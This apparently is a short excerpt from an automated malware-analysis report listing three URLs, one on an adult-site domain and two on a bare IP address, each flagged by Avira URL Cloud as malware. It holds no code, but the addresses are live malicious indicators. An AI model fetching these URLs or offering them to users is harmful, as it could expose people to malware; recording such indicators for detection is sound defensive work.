http://kuyporn.com/wp-content/XSs5/ true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.168/qqw/aas/se.html true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.168/qqw/aas/se.png true
  • Avira URL Cloud: malware
 unknown